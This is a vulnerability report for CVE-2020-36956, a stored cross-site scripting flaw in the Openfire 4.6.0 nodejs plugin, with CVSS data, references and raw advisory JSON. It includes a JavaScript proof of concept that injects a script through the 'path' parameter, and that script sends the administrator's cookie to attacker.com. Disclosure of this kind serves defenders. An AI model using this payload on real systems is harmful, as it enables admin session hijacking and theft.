Security Vulnerability Report
CVE-2020-36956 CVSS 6.4 MEDIUM

Published: 2026-01-26 18:16:26
Last Modified: 2026-04-15 00:35:42

Description

Openfire 4.6.0 contains a stored cross-site scripting vulnerability in the nodejs plugin that allows attackers to inject malicious scripts through the 'path' parameter. Attackers can craft a payload with script tags to execute arbitrary JavaScript in the context of administrative users viewing the nodejs configuration page.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Openfire 4.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2020-36956 PoC - Stored XSS in Openfire nodejs plugin path parameter
// Target: Openfire 4.6.0 with nodejs plugin
// This PoC demonstrates injecting JavaScript via the 'path' parameter

// Step 1: Authenticate with low-privilege account
const authToken = 'Basic ' + btoa('lowpriv_user:password');

// Step 2: Inject malicious script through path parameter
const payload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';
const xssPayload = encodeURIComponent(payload);

// Step 3: Send crafted request to nodejs plugin configuration endpoint
fetch('http://target:9090/plugins/nodejs/settings', {
  method: 'POST',
  headers: {
    'Authorization': authToken,
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: `path=${xssPayload}&save=Save`
});

// When admin visits the nodejs config page, the script executes:
// - Cookie is stolen and sent to attacker-controlled server
// - Attacker can hijack admin session
// - Attacker gains full admin access to Openfire management console

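References

https://github.com/igniterealtime/Openfire
https://www.exploit-db.com/exploits/49229
https://www.igniterealtime.org/downloads/
https://www.vulncheck.com/advisories/openfire-path-stored-xss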

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36956", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Openfire 4.6.0 contains a stored cross-site scripting vulnerability in the nodejs plugin that allows attackers to inject malicious scripts through the 'path' parameter. Attackers can craft a payload with script tags to execute arbitrary JavaScript in the context of administrative users viewing the nodejs configuration page."}, {"lang": "es", "value": "Openfire 4.6.0 contiene una vulnerabilidad de cross-site scripting almacenado en el plugin de nodejs que permite a los atacantes inyectar scripts maliciosos a través del parámetro 'path'. Los atacantes pueden crear una carga útil con etiquetas de script para ejecutar JavaScript arbitrario en el contexto de usuarios administrativos que visualizan la página de configuración de nodejs."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/igniterealtime/Openfire", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49229", "source": "[email protected]"}, {"url": "https://www.igniterealtime.org/downloads/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/openfire-path-stored-xss", "source": "[email protected]"}]}}